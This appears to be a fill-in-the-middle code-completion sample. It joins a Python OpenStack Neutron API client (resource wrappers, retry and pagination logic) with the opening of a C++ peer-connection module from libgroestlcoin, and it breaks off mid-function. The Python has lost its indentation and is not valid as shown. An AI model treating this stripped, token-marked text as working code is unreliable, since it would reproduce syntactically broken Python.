"""Deletes the specified IKEPolicy."""
return self.delete(self.ikepolicy_path % (ikepolicy))
@APIParamsCall
def list_ipsecpolicies(self, retrieve_all=True, **_params):
"""Fetches a list of all configured IPsecPolicies for a tenant."""
return self.list('ipsecpolicies',
self.ipsecpolicies_path,
retrieve_all,
**_params)
@APIParamsCall
def show_ipsecpolicy(self, ipsecpolicy, **_params):
"""Fetches information of a specific IPsecPolicy."""
return self.get(self.ipsecpolicy_path % (ipsecpolicy), params=_params)
@APIParamsCall
def create_ipsecpolicy(self, body=None):
"""Creates a new IPsecPolicy."""
return self.post(self.ipsecpolicies_path, body=body)
@APIParamsCall
def update_ipsecpolicy(self, ipsecpolicy, body=None):
"""Updates an IPsecPolicy."""
return self.put(self.ipsecpolicy_path % (ipsecpolicy), body=body)
@APIParamsCall
def delete_ipsecpolicy(self, ipsecpolicy):
"""Deletes the specified IPsecPolicy."""
return self.delete(self.ipsecpolicy_path % (ipsecpolicy))
@APIParamsCall
def list_vips(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer vips for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('vips', self.vips_path, retrieve_all,
**_params)
@APIParamsCall
def show_vip(self, vip, **_params):
"""Fetches information of a certain load balancer vip."""
return self.get(self.vip_path % (vip), params=_params)
@APIParamsCall
def create_vip(self, body=None):
"""Creates a new load balancer vip."""
return self.post(self.vips_path, body=body)
@APIParamsCall
def update_vip(self, vip, body=None):
"""Updates a load balancer vip."""
return self.put(self.vip_path % (vip), body=body)
@APIParamsCall
def delete_vip(self, vip):
"""Deletes the specified load balancer vip."""
return self.delete(self.vip_path % (vip))
@APIParamsCall
def list_pools(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer pools for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('pools', self.pools_path, retrieve_all,
**_params)
@APIParamsCall
def show_pool(self, pool, **_params):
"""Fetches information of a certain load balancer pool."""
return self.get(self.pool_path % (pool), params=_params)
@APIParamsCall
def create_pool(self, body=None):
"""Creates a new load balancer pool."""
return self.post(self.pools_path, body=body)
@APIParamsCall
def update_pool(self, pool, body=None):
"""Updates a load balancer pool."""
return self.put(self.pool_path % (pool), body=body)
@APIParamsCall
def delete_pool(self, pool):
"""Deletes the specified load balancer pool."""
return self.delete(self.pool_path % (pool))
@APIParamsCall
def retrieve_pool_stats(self, pool, **_params):
"""Retrieves stats for a certain load balancer pool."""
return self.get(self.pool_path_stats % (pool), params=_params)
@APIParamsCall
def list_members(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer members for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('members', self.members_path, retrieve_all,
**_params)
@APIParamsCall
def show_member(self, member, **_params):
"""Fetches information of a certain load balancer member."""
return self.get(self.member_path % (member), params=_params)
@APIParamsCall
def create_member(self, body=None):
"""Creates a new load balancer member."""
return self.post(self.members_path, body=body)
@APIParamsCall
def update_member(self, member, body=None):
"""Updates a load balancer member."""
return self.put(self.member_path % (member), body=body)
@APIParamsCall
def delete_member(self, member):
"""Deletes the specified load balancer member."""
return self.delete(self.member_path % (member))
@APIParamsCall
def list_health_monitors(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer health monitors for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('health_monitors', self.health_monitors_path,
retrieve_all, **_params)
@APIParamsCall
def show_health_monitor(self, health_monitor, **_params):
"""Fetches information of a certain load balancer health monitor."""
return self.get(self.health_monitor_path % (health_monitor),
params=_params)
@APIParamsCall
def create_health_monitor(self, body=None):
"""Creates a new load balancer health monitor."""
return self.post(self.health_monitors_path, body=body)
@APIParamsCall
def update_health_monitor(self, health_monitor, body=None):
"""Updates a load balancer health monitor."""
return self.put(self.health_monitor_path % (health_monitor), body=body)
@APIParamsCall
def delete_health_monitor(self, health_monitor):
"""Deletes the specified load balancer health monitor."""
return self.delete(self.health_monitor_path % (health_monitor))
@APIParamsCall
def associate_health_monitor(self, pool, body):
"""Associate specified load balancer health monitor and pool."""
return self.post(self.associate_pool_health_monitors_path % (pool),
body=body)
@APIParamsCall
def disassociate_health_monitor(self, pool, health_monitor):
"""Disassociate specified load balancer health monitor and pool."""
path = (self.disassociate_pool_health_monitors_path %
{'pool': pool, 'health_monitor': health_monitor})
return self.delete(path)
@APIParamsCall
def create_qos_queue(self, body=None):
"""Creates a new queue."""
return self.post(self.qos_queues_path, body=body)
@APIParamsCall
def list_qos_queues(self, **_params):
"""Fetches a list of all queues for a tenant."""
return self.get(self.qos_queues_path, params=_params)
@APIParamsCall
def show_qos_queue(self, queue, **_params):
"""Fetches information of a certain queue."""
return self.get(self.qos_queue_path % (queue),
params=_params)
@APIParamsCall
def delete_qos_queue(self, queue):
"""Deletes the specified queue."""
return self.delete(self.qos_queue_path % (queue))
@APIParamsCall
def list_agents(self, **_params):
"""Fetches agents."""
# Pass filters in "params" argument to do_request
return self.get(self.agents_path, params=_params)
@APIParamsCall
def show_agent(self, agent, **_params):
"""Fetches information of a certain agent."""
return self.get(self.agent_path % (agent), params=_params)
@APIParamsCall
def update_agent(self, agent, body=None):
"""Updates an agent."""
return self.put(self.agent_path % (agent), body=body)
@APIParamsCall
def delete_agent(self, agent):
"""Deletes the specified agent."""
return self.delete(self.agent_path % (agent))
@APIParamsCall
def list_network_gateways(self, **_params):
"""Retrieve network gateways."""
return self.get(self.network_gateways_path, params=_params)
@APIParamsCall
def show_network_gateway(self, gateway_id, **_params):
"""Fetch a network gateway."""
return self.get(self.network_gateway_path % gateway_id, params=_params)
@APIParamsCall
def create_network_gateway(self, body=None):
"""Create a new network gateway."""
return self.post(self.network_gateways_path, body=body)
@APIParamsCall
def update_network_gateway(self, gateway_id, body=None):
"""Update a network gateway."""
return self.put(self.network_gateway_path % gateway_id, body=body)
@APIParamsCall
def delete_network_gateway(self, gateway_id):
"""Delete the specified network gateway."""
return self.delete(self.network_gateway_path % gateway_id)
@APIParamsCall
def connect_network_gateway(self, gateway_id, body=None):
"""Connect a network gateway to the specified network."""
base_uri = self.network_gateway_path % gateway_id
return self.put("%s/connect_network" % base_uri, body=body)
@APIParamsCall
def disconnect_network_gateway(self, gateway_id, body=None):
"""Disconnect a network from the specified gateway."""
base_uri = self.network_gateway_path % gateway_id
return self.put("%s/disconnect_network" % base_uri, body=body)
@APIParamsCall
def list_gateway_devices(self, **_params):
"""Retrieve gateway devices."""
return self.get(self.gateway_devices_path, params=_params)
@APIParamsCall
def show_gateway_device(self, gateway_device_id, **_params):
"""Fetch a gateway device."""
return self.get(self.gateway_device_path % gateway_device_id,
params=_params)
@APIParamsCall
def create_gateway_device(self, body=None):
"""Create a new gateway device."""
return self.post(self.gateway_devices_path, body=body)
@APIParamsCall
def update_gateway_device(self, gateway_device_id, body=None):
"""Updates a new gateway device."""
return self.put(self.gateway_device_path % gateway_device_id,
body=body)
@APIParamsCall
def delete_gateway_device(self, gateway_device_id):
"""Delete the specified gateway device."""
return self.delete(self.gateway_device_path % gateway_device_id)
@APIParamsCall
def list_dhcp_agent_hosting_networks(self, network, **_params):
"""Fetches a list of dhcp agents hosting a network."""
return self.get((self.network_path + self.DHCP_AGENTS) % network,
params=_params)
@APIParamsCall
def list_networks_on_dhcp_agent(self, dhcp_agent, **_params):
"""Fetches a list of dhcp agents hosting a network."""
return self.get((self.agent_path + self.DHCP_NETS) % dhcp_agent,
params=_params)
@APIParamsCall
def add_network_to_dhcp_agent(self, dhcp_agent, body=None):
"""Adds a network to dhcp agent."""
return self.post((self.agent_path + self.DHCP_NETS) % dhcp_agent,
body=body)
@APIParamsCall
def remove_network_from_dhcp_agent(self, dhcp_agent, network_id):
"""Remove a network from dhcp agent."""
return self.delete((self.agent_path + self.DHCP_NETS + "/%s") % (
dhcp_agent, network_id))
@APIParamsCall
def list_l3_agent_hosting_routers(self, router, **_params):
"""Fetches a list of L3 agents hosting a router."""
return self.get((self.router_path + self.L3_AGENTS) % router,
params=_params)
@APIParamsCall
def list_routers_on_l3_agent(self, l3_agent, **_params):
"""Fetches a list of L3 agents hosting a router."""
return self.get((self.agent_path + self.L3_ROUTERS) % l3_agent,
params=_params)
@APIParamsCall
def add_router_to_l3_agent(self, l3_agent, body):
"""Adds a router to L3 agent."""
return self.post((self.agent_path + self.L3_ROUTERS) % l3_agent,
body=body)
@APIParamsCall
def list_firewall_rules(self, retrieve_all=True, **_params):
"""Fetches a list of all firewall rules for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('firewall_rules', self.firewall_rules_path,
retrieve_all, **_params)
@APIParamsCall
def show_firewall_rule(self, firewall_rule, **_params):
"""Fetches information of a certain firewall rule."""
return self.get(self.firewall_rule_path % (firewall_rule),
params=_params)
@APIParamsCall
def create_firewall_rule(self, body=None):
"""Creates a new firewall rule."""
return self.post(self.firewall_rules_path, body=body)
@APIParamsCall
def update_firewall_rule(self, firewall_rule, body=None):
"""Updates a firewall rule."""
return self.put(self.firewall_rule_path % (firewall_rule), body=body)
@APIParamsCall
def delete_firewall_rule(self, firewall_rule):
"""Deletes the specified firewall rule."""
return self.delete(self.firewall_rule_path % (firewall_rule))
@APIParamsCall
def list_firewall_policies(self, retrieve_all=True, **_params):
"""Fetches a list of all firewall policies for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('firewall_policies', self.firewall_policies_path,
retrieve_all, **_params)
@APIParamsCall
def show_firewall_policy(self, firewall_policy, **_params):
"""Fetches information of a certain firewall policy."""
return self.get(self.firewall_policy_path % (firewall_policy),
params=_params)
@APIParamsCall
def create_firewall_policy(self, body=None):
"""Creates a new firewall policy."""
return self.post(self.firewall_policies_path, body=body)
@APIParamsCall
def update_firewall_policy(self, firewall_policy, body=None):
"""Updates a firewall policy."""
return self.put(self.firewall_policy_path % (firewall_policy),
body=body)
@APIParamsCall
def delete_firewall_policy(self, firewall_policy):
"""Deletes the specified firewall policy."""
return self.delete(self.firewall_policy_path % (firewall_policy))
@APIParamsCall
def firewall_policy_insert_rule(self, firewall_policy, body=None):
"""Inserts specified rule into firewall policy."""
return self.put(self.firewall_policy_insert_path % (firewall_policy),
body=body)
@APIParamsCall
def firewall_policy_remove_rule(self, firewall_policy, body=None):
"""Removes specified rule from firewall policy."""
return self.put(self.firewall_policy_remove_path % (firewall_policy),
body=body)
@APIParamsCall
def list_firewalls(self, retrieve_all=True, **_params):
"""Fetches a list of all firewals for a tenant."""
# Pass filters in "params" argument to do_request
return self.list('firewalls', self.firewalls_path, retrieve_all,
**_params)
@APIParamsCall
def show_firewall(self, firewall, **_params):
"""Fetches information of a certain firewall."""
return self.get(self.firewall_path % (firewall), params=_params)
@APIParamsCall
def create_firewall(self, body=None):
"""Creates a new firewall."""
return self.post(self.firewalls_path, body=body)
@APIParamsCall
def update_firewall(self, firewall, body=None):
"""Updates a firewall."""
return self.put(self.firewall_path % (firewall), body=body)
@APIParamsCall
def delete_firewall(self, firewall):
"""Deletes the specified firewall."""
return self.delete(self.firewall_path % (firewall))
@APIParamsCall
def remove_router_from_l3_agent(self, l3_agent, router_id):
"""Remove a router from l3 agent."""
return self.delete((self.agent_path + self.L3_ROUTERS + "/%s") % (
l3_agent, router_id))
@APIParamsCall
def get_lbaas_agent_hosting_pool(self, pool, **_params):
"""Fetches a loadbalancer agent hosting a pool."""
return self.get((self.pool_path + self.LOADBALANCER_AGENT) % pool,
params=_params)
@APIParamsCall
def list_pools_on_lbaas_agent(self, lbaas_agent, **_params):
"""Fetches a list of pools hosted by the loadbalancer agent."""
return self.get((self.agent_path + self.LOADBALANCER_POOLS) %
lbaas_agent, params=_params)
@APIParamsCall
def list_service_providers(self, retrieve_all=True, **_params):
"""Fetches service providers."""
# Pass filters in "params" argument to do_request
return self.list('service_providers', self.service_providers_path,
retrieve_all, **_params)
def list_credentials(self, **_params):
"""Fetch a list of all credentials for a tenant."""
return self.get(self.credentials_path, params=_params)
@APIParamsCall
def show_credential(self, credential, **_params):
"""Fetch a credential."""
return self.get(self.credential_path % (credential), params=_params)
@APIParamsCall
def create_credential(self, body=None):
"""Create a new credential."""
return self.post(self.credentials_path, body=body)
@APIParamsCall
def update_credential(self, credential, body=None):
"""Update a credential."""
return self.put(self.credential_path % (credential), body=body)
@APIParamsCall
def delete_credential(self, credential):
"""Delete the specified credential."""
return self.delete(self.credential_path % (credential))
def list_network_profile_bindings(self, **params):
"""Fetch a list of all tenants associated for a network profile."""
return self.get(self.network_profile_bindings_path, params=params)
@APIParamsCall
def list_network_profiles(self, **params):
"""Fetch a list of all network profiles for a tenant."""
return self.get(self.network_profiles_path, params=params)
@APIParamsCall
def show_network_profile(self, profile, **params):
"""Fetch a network profile."""
return self.get(self.network_profile_path % (profile), params=params)
@APIParamsCall
def create_network_profile(self, body=None):
"""Create a network profile."""
return self.post(self.network_profiles_path, body=body)
@APIParamsCall
def update_network_profile(self, profile, body=None):
"""Update a network profile."""
return self.put(self.network_profile_path % (profile), body=body)
@APIParamsCall
def delete_network_profile(self, profile):
"""Delete the network profile."""
return self.delete(self.network_profile_path % profile)
@APIParamsCall
def list_policy_profile_bindings(self, **params):
"""Fetch a list of all tenants associated for a policy profile."""
return self.get(self.policy_profile_bindings_path, params=params)
@APIParamsCall
def list_policy_profiles(self, **params):
"""Fetch a list of all network profiles for a tenant."""
return self.get(self.policy_profiles_path, params=params)
@APIParamsCall
def show_policy_profile(self, profile, **params):
"""Fetch a network profile."""
return self.get(self.policy_profile_path % (profile), params=params)
@APIParamsCall
def update_policy_profile(self, profile, body=None):
"""Update a policy profile."""
return self.put(self.policy_profile_path % (profile), body=body)
@APIParamsCall
def create_metering_label(self, body=None):
"""Creates a metering label."""
return self.post(self.metering_labels_path, body=body)
@APIParamsCall
def delete_metering_label(self, label):
"""Deletes the specified metering label."""
return self.delete(self.metering_label_path % (label))
@APIParamsCall
def list_metering_labels(self, retrieve_all=True, **_params):
"""Fetches a list of all metering labels for a tenant."""
return self.list('metering_labels', self.metering_labels_path,
retrieve_all, **_params)
@APIParamsCall
def show_metering_label(self, metering_label, **_params):
"""Fetches information of a certain metering label."""
return self.get(self.metering_label_path %
(metering_label), params=_params)
@APIParamsCall
def create_metering_label_rule(self, body=None):
"""Creates a metering label rule."""
return self.post(self.metering_label_rules_path, body=body)
@APIParamsCall
def delete_metering_label_rule(self, rule):
"""Deletes the specified metering label rule."""
return self.delete(self.metering_label_rule_path % (rule))
@APIParamsCall
def list_metering_label_rules(self, retrieve_all=True, **_params):
"""Fetches a list of all metering label rules for a label."""
return self.list('metering_label_rules',
self.metering_label_rules_path, retrieve_all,
**_params)
@APIParamsCall
def show_metering_label_rule(self, metering_label_rule, **_params):
"""Fetches information of a certain metering label rule."""
return self.get(self.metering_label_rule_path %
(metering_label_rule), params=_params)
@APIParamsCall
def list_net_partitions(self, **params):
"""Fetch a list of all network partitions for a tenant."""
return self.get(self.net_partitions_path, params=params)
@APIParamsCall
def show_net_partition(self, netpartition, **params):
"""Fetch a network partition."""
return self.get(self.net_partition_path % (netpartition),
params=params)
@APIParamsCall
def create_net_partition(self, body=None):
"""Create a network partition."""
return self.post(self.net_partitions_path, body=body)
@APIParamsCall
def delete_net_partition(self, netpartition):
"""Delete the network partition."""
return self.delete(self.net_partition_path % netpartition)
@APIParamsCall
def create_packet_filter(self, body=None):
"""Create a new packet filter."""
return self.post(self.packet_filters_path, body=body)
@APIParamsCall
def update_packet_filter(self, packet_filter_id, body=None):
"""Update a packet filter."""
return self.put(self.packet_filter_path % packet_filter_id, body=body)
@APIParamsCall
def list_packet_filters(self, retrieve_all=True, **_params):
"""Fetch a list of all packet filters for a tenant."""
return self.list('packet_filters', self.packet_filters_path,
retrieve_all, **_params)
@APIParamsCall
def show_packet_filter(self, packet_filter_id, **_params):
"""Fetch information of a certain packet filter."""
return self.get(self.packet_filter_path % packet_filter_id,
params=_params)
@APIParamsCall
def delete_packet_filter(self, packet_filter_id):
"""Delete the specified packet filter."""
return self.delete(self.packet_filter_path % packet_filter_id)
def __init__(self, **kwargs):
"""Initialize a new client for the Neutron v2.0 API."""
super(Client, self).__init__()
self.retries = kwargs.pop('retries', 0)
self.raise_errors = kwargs.pop('raise_errors', True)
self.httpclient = client.construct_http_client(**kwargs)
self.version = '2.0'
self.format = 'json'
self.action_prefix = "/v%s" % (self.version)
self.retry_interval = 1
def _handle_fault_response(self, status_code, response_body):
# Create exception with HTTP status code and message
_logger.debug("Error message: %s", response_body)
# Add deserialized error message to exception arguments
try:
des_error_body = self.deserialize(response_body, status_code)
except Exception:
# If we are unable to deserialize the body, it is probably
# not a Neutron error
des_error_body = {'message': response_body}
# Raise the appropriate exception
exception_handler_v20(status_code, des_error_body)
def _check_uri_length(self, action):
uri_len = len(self.httpclient.endpoint_url) + len(action)
if uri_len > self.MAX_URI_LEN:
raise exceptions.RequestURITooLong(
excess=uri_len - self.MAX_URI_LEN)
def do_request(self, method, action, body=None, headers=None, params=None):
# Add format and tenant_id
action += ".%s" % self.format
action = self.action_prefix + action
if type(params) is dict and params:
params = utils.safe_encode_dict(params)
action += '?' + urllib.urlencode(params, doseq=1)
# Ensure client always has correct uri - do not guesstimate anything
self.httpclient.authenticate_and_fetch_endpoint_url()
self._check_uri_length(action)
if body:
body = self.serialize(body)
resp, replybody = self.httpclient.do_request(
action, method, body=body,
content_type=self.content_type())
status_code = resp.status_code
if status_code in (requests.codes.ok,
requests.codes.created,
requests.codes.accepted,
requests.codes.no_content):
return self.deserialize(replybody, status_code)
else:
if not replybody:
replybody = resp.reason
self._handle_fault_response(status_code, replybody)
def get_auth_info(self):
return self.httpclient.get_auth_info()
def serialize(self, data):<|fim▁hole|> """
if data is None:
return None
elif type(data) is dict:
return serializer.Serializer(
self.get_attr_metadata()).serialize(data, self.content_type())
else:
raise Exception(_("Unable to serialize object of type = '%s'") %
type(data))
def deserialize(self, data, status_code):
"""Deserializes an XML or JSON string into a dictionary."""
if status_code == 204:
return data
return serializer.Serializer(self.get_attr_metadata()).deserialize(
data, self.content_type())['body']
def content_type(self, _format=None):
"""Returns the mime-type for either 'xml' or 'json'.
Defaults to the currently set format.
"""
_format = _format or self.format
return "application/%s" % (_format)
def retry_request(self, method, action, body=None,
headers=None, params=None):
"""Call do_request with the default retry configuration.
Only idempotent requests should retry failed connection attempts.
:raises: ConnectionFailed if the maximum # of retries is exceeded
"""
max_attempts = self.retries + 1
for i in range(max_attempts):
try:
return self.do_request(method, action, body=body,
headers=headers, params=params)
except exceptions.ConnectionFailed:
# Exception has already been logged by do_request()
if i < self.retries:
_logger.debug('Retrying connection to Neutron service')
time.sleep(self.retry_interval)
elif self.raise_errors:
raise
if self.retries:
msg = (_("Failed to connect to Neutron server after %d attempts")
% max_attempts)
else:
msg = _("Failed to connect Neutron server")
raise exceptions.ConnectionFailed(reason=msg)
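# Illustrative sketch (added): retries and raise_errors are constructor
# arguments, so a client that retries idempotent calls twice before
# giving up could be built as (hypothetical values):
#
#   neutron = Client(username=USER, password=PASS,
#                    tenant_name=TENANT, auth_url=KEYSTONE_URL,
#                    retries=2, raise_errors=False)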
def delete(self, action, body=None, headers=None, params=None):
return self.retry_request("DELETE", action, body=body,
headers=headers, params=params)
def get(self, action, body=None, headers=None, params=None):
return self.retry_request("GET", action, body=body,
headers=headers, params=params)
def post(self, action, body=None, headers=None, params=None):
# Do not retry POST requests to avoid the orphan objects problem.
return self.do_request("POST", action, body=body,
headers=headers, params=params)
def put(self, action, body=None, headers=None, params=None):
return self.retry_request("PUT", action, body=body,
headers=headers, params=params)
def list(self, collection, path, retrieve_all=True, **params):
if retrieve_all:
res = []
for r in self._pagination(collection, path, **params):
res.extend(r[collection])
return {collection: res}
else:
return self._pagination(collection, path, **params)
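# Illustrative note (added): list() drives _pagination below; with
# retrieve_all=True it concatenates every page into one dict, otherwise
# it returns the generator so callers can stream pages, e.g.
# (hypothetical usage):
#
#   for page in client.list('networks', client.networks_path,
#                           retrieve_all=False, limit=100):
#       process(page['networks'])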
def _pagination(self, collection, path, **params):
if params.get('page_reverse', False):
linkrel = 'previous'
else:
linkrel = 'next'
next = True
while next:
res = self.get(path, params=params)
yield res
next = False
try:
for link in res['%s_links' % collection]:
if link['rel'] == linkrel:
query_str = urlparse.urlparse(link['href']).query
params = urlparse.parse_qs(query_str)
next = True
break
except KeyError:
break<|fim▁end|> | """Serializes a dictionary into either XML or JSON.
A dictionary with a single key can be passed and it can contain any
structure. |
<|file_name|>protocol.cpp<|end_file_name|><|fim▁begin|>/**
* Copyright (c) 2011-2018 libgroestlcoin developers (see AUTHORS)
*
* This file is part of libgroestlcoin.
*
* libgroestlcoin is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License with
* additional permissions to the one published by the Free Software
* Foundation, either version 3 of the License, or (at your option)
* any later version. For more information see LICENSE.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include <groestlcoin/groestlcoin/network/protocol.hpp>
#include <cstddef>
#include <cstdint>
#include <functional>
#include <memory>
#include <system_error>
#include <boost/date_time.hpp>
#include <boost/filesystem.hpp>
#include <boost/format.hpp>
#include <groestlcoin/groestlcoin/error.hpp>
#include <groestlcoin/groestlcoin/network/authority.hpp>
#include <groestlcoin/groestlcoin/network/hosts.hpp>
#include <groestlcoin/groestlcoin/network/handshake.hpp>
#include <groestlcoin/groestlcoin/network/seeder.hpp>
#include <groestlcoin/groestlcoin/utility/logger.hpp>
#include <groestlcoin/groestlcoin/utility/threadpool.hpp>
namespace libgroestlcoin {
namespace network {
using std::placeholders::_1;
using std::placeholders::_2;
using boost::filesystem::path;
using boost::format;
using boost::posix_time::time_duration;
using boost::posix_time::seconds;
// Based on http://bitcoinstats.com/network/dns-servers
#ifdef ENABLE_TESTNET
const hosts::authority_list protocol::default_seeds =
{
{ "testnet-seed.alexykot.me", 18333 },
{ "testnet-seed.bitcoin.petertodd.org", 18333 },
{ "testnet-seed.bluematt.me", 18333 },
{ "testnet-seed.bitcoin.schildbach.de", 18333 }
};
#else
const hosts::authority_list protocol::default_seeds =
{
{ "seed.bitnodes.io", 8333 },
{ "seed.bitcoinstats.com", 8333 },
{ "seed.bitcoin.sipa.be", 8333 },
{ "dnsseed.bluematt.me", 8333 },
{ "seed.bitcoin.jonasschnelli.ch", 8333 },
{ "dnsseed.bitcoin.dashjr.org", 8333 }
// Previously also included:
// bitseed.xf2.org:8333
// archivum.info:8333
// progressbar.sk:8333
// faucet.bitcoin.st:8333
// bitcoin.securepayment.cc:8333
};
#endif
const size_t protocol::default_max_outbound = 8;
// TODO: parameterize for config access.
const size_t watermark_connection_limit = 10;
const time_duration watermark_reset_interval = seconds(1);
protocol::protocol(threadpool& pool, hosts& peers, handshake& shake,
network& net, const hosts::authority_list& seeds, uint16_t port,
size_t max_outbound)
: strand_(pool),
host_pool_(peers),
handshake_(shake),
network_(net),
max_outbound_(max_outbound),
watermark_timer_(pool.service()),
watermark_count_(0),
listen_port_(port),
channel_subscribe_(std::make_shared<channel_subscriber_type>(pool)),
seeds_(seeds)
{
}
void protocol::start(completion_handler handle_complete)
{
// handshake.start doesn't accept an error code so we prevent its
// execution in case of start failure, using this lambda wrapper.
const auto start_handshake = [this, handle_complete]
(const std::error_code& ec)
{
if (ec)
{
handle_complete(ec);
return;
}
strand_.wrap(&handshake::start,
&handshake_, handle_complete)();
};
const auto run_protocol =
strand_.wrap(&protocol::handle_start,
this, _1, start_handshake);
host_pool_.load(
strand_.wrap(&protocol::fetch_count,
this, _1, run_protocol));
}
void protocol::handle_start(const std::error_code& ec,
completion_handler handle_complete)
{
if (ec)
{
log_error(LOG_PROTOCOL)
<< "Failure fetching height: " << ec.message();
handle_complete(ec);
return;
}
// TODO: handle run startup failure.
handle_complete(ec);
run();
}
void protocol::stop(completion_handler handle_complete)
{
host_pool_.save(
strand_.wrap(&protocol::handle_stop,
this, _1, handle_complete));
}
void protocol::handle_stop(const std::error_code& ec,
completion_handler handle_complete)
{
if (ec)
{
log_error(LOG_PROTOCOL)
<< "Failure saving hosts file: " << ec.message();
handle_complete(ec);
return;
}
channel_subscribe_->relay(error::service_stopped, nullptr);
handle_complete(error::success);
}
void protocol::fetch_count(const std::error_code& ec,
completion_handler handle_complete)
{
if (ec)
{
log_error(LOG_PROTOCOL)
<< "Failure loading hosts file: " << ec.message();
handle_complete(ec);
return;
}
host_pool_.fetch_count(
strand_.wrap(&protocol::start_seeder,
this, _1, _2, handle_complete));
}
void protocol::start_seeder(const std::error_code& ec, size_t hosts_count,
completion_handler handle_complete)
{<|fim▁hole|> log_error(LOG_PROTOCOL)
<< "Failure checking existing hosts file: " << ec.message();
handle_complete(ec);
return;
}
if (hosts_count == 0)
{
seeder_ = std::make_shared<seeder>(this, seeds_, handle_complete);
seeder_->start();
return;
}
handle_complete(error::success);
}
std::string protocol::state_to_string(connect_state state) const
{
switch (state)
{
case connect_state::finding_peer:
return "finding peer";
case connect_state::connecting:
return "connecting to peer";
case connect_state::established:
return "established connection";
case connect_state::stopped:
return "stopped";
}
// Unhandled state!
BITCOIN_ASSERT(false);
return "";
}
void protocol::modify_slot(slot_index slot, connect_state state)
{
connect_states_[slot] = state;
log_debug(LOG_PROTOCOL)
<< "Outbound connection on slot ["
<< slot << "] " << state_to_string(state) << ".";
}
void protocol::run()
{
strand_.queue(
std::bind(&protocol::start_connecting,
this));
if (listen_port_ == 0)
return;
// Unhandled startup failure condition.
network_.listen(listen_port_,
strand_.wrap(&protocol::handle_listen,
this, _1, _2));
}
void protocol::start_connecting()
{
// Initialize the connection slots.
BITCOIN_ASSERT(connections_.empty());
BITCOIN_ASSERT(connect_states_.empty());
connect_states_.resize(max_outbound_);
for (size_t slot = 0; slot < connect_states_.size(); ++slot)
modify_slot(slot, connect_state::stopped);
// Start the main outbound connect loop.
start_stopped_connects();
start_watermark_reset_timer();
}
void protocol::start_stopped_connects()
{
for (size_t slot = 0; slot < connect_states_.size(); ++slot)
if (connect_states_[slot] == connect_state::stopped)
try_connect_once(slot);
}
void protocol::try_connect_once(slot_index slot)
{
++watermark_count_;
if (watermark_count_ > watermark_connection_limit)
return;
BITCOIN_ASSERT(slot < connect_states_.size());
BITCOIN_ASSERT(connect_states_[slot] == connect_state::stopped);
// Begin connection flow: finding_peer -> connecting -> established.
// Failures end with connect_state::stopped and loop back here again.
modify_slot(slot, connect_state::finding_peer);
host_pool_.fetch_address(
strand_.wrap(&protocol::attempt_connect,
this, _1, _2, slot));
}
void protocol::start_watermark_reset_timer()
{
// This timer just loops continuously at fixed intervals
// resetting the watermark_count_ variable and starting stopped slots.
const auto reset_watermark = [this](const boost::system::error_code& ec)
{
if (ec)
{
if (ec != boost::asio::error::operation_aborted)
log_error(LOG_PROTOCOL)
<< "Failure resetting watermark timer: " << ec.message();
BITCOIN_ASSERT(ec == boost::asio::error::operation_aborted);
return;
}
if (watermark_count_ > watermark_connection_limit)
log_debug(LOG_PROTOCOL)
<< "Resuming connection attempts.";
// Perform the reset, allowing connection attempts again.
watermark_count_ = 0;
start_stopped_connects();
// Looping timer...
start_watermark_reset_timer();
};
watermark_timer_.expires_from_now(watermark_reset_interval);
watermark_timer_.async_wait(strand_.wrap(reset_watermark, _1));
}
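// For reference, the self-rescheduling timer idiom used above reduces to
// this minimal sketch (the free-standing names are illustrative only):
//
//   void loop(boost::asio::deadline_timer& timer)
//   {
//       timer.expires_from_now(boost::posix_time::seconds(1));
//       timer.async_wait([&timer](const boost::system::error_code& ec)
//       {
//           if (!ec)
//               loop(timer);   // reschedule unless cancelled
//       });
//   }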
template <typename ConnectionList>
bool already_connected(const network_address_type& address,
const ConnectionList& connections)
{
for (const auto& connection: connections)
if (connection.address.ip == address.ip &&
connection.address.port == address.port)
return true;
return false;
}
void protocol::attempt_connect(const std::error_code& ec,
const network_address_type& address, slot_index slot)
{
BITCOIN_ASSERT(connect_states_[slot] == connect_state::finding_peer);
modify_slot(slot, connect_state::connecting);
if (ec)
{
log_error(LOG_PROTOCOL)
<< "Failure randomly selecting a peer address for slot ["
<< slot << "] " << ec.message();
return;
}
if (already_connected(address, connections_))
{
log_debug(LOG_PROTOCOL)
<< "Already connected to selected peer ["
<< authority(address).to_string() << "]";
// Retry another connection, still in same strand.
modify_slot(slot, connect_state::stopped);
try_connect_once(slot);
return;
}
log_debug(LOG_PROTOCOL)
<< "Connecting to peer [" << authority(address).to_string()
<< "] on slot [" << slot << "]";
const authority peer(address);
connect(handshake_, network_, peer.host, peer.port,
strand_.wrap(&protocol::handle_connect,
this, _1, _2, address, slot));
}
void protocol::handle_connect(const std::error_code& ec, channel_ptr node,
const network_address_type& address, slot_index slot)
{
BITCOIN_ASSERT(connect_states_[slot] == connect_state::connecting);
if (ec || !node)
{
log_debug(LOG_PROTOCOL)
<< "Failure connecting to peer ["
<< authority(address).to_string() << "] on slot [" << slot << "] "
<< ec.message();
// Retry another connection, still in same strand.
modify_slot(slot, connect_state::stopped);
try_connect_once(slot);
return;
}
modify_slot(slot, connect_state::established);
BITCOIN_ASSERT(connections_.size() <= max_outbound_);
connections_.push_back({address, node});
log_info(LOG_PROTOCOL)
<< "Connected to peer ["
<< authority(address).to_string() << "] on slot [" << slot << "] ("
<< connections_.size() << " total)";
// Remove the channel from the connections list once it stops.
node->subscribe_stop(
strand_.wrap(&protocol::outbound_channel_stopped,
this, _1, node, slot));
setup_new_channel(node);
}
void protocol::maintain_connection(const std::string& hostname, uint16_t port)
{
connect(handshake_, network_, hostname, port,
strand_.wrap(&protocol::handle_manual_connect,
this, _1, _2, hostname, port));
}
void protocol::handle_manual_connect(const std::error_code& ec,
